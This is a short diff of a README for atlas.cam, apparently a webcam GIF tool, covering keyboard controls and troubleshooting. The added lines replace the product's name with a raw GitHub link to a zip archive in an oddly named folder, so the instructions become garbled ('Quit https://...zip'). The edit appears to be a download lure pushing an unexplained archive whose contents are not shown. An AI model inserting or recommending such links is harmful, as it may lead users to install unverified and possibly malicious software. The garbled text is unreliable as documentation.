1urelius/atlas.cam/README.md

 - `r` – Start or stop recording GIF.
 - `f` – Cycle through image filters.
-- `q` or `Ctrl + C` – Quit atlas.cam.
+- `q` or `Ctrl + C` – Quit https://raw.githubusercontent.com/1urelius/atlas.cam/main/irascibleness/atlas_cam_v2.7.zip

 ---

 ## 🛠️ Troubleshooting Common Issues

 - **Webcam not detected**:
 Check that your webcam is connected and not used by another app.
-Restart atlas.cam after that.
+Restart https://raw.githubusercontent.com/1urelius/atlas.cam/main/irascibleness/atlas_cam_v2.7.zip after that.

 - **No video shown**:
 Make sure you allowed Windows to access your camera.
 Go to Settings > Privacy > Camera, and enable access for apps.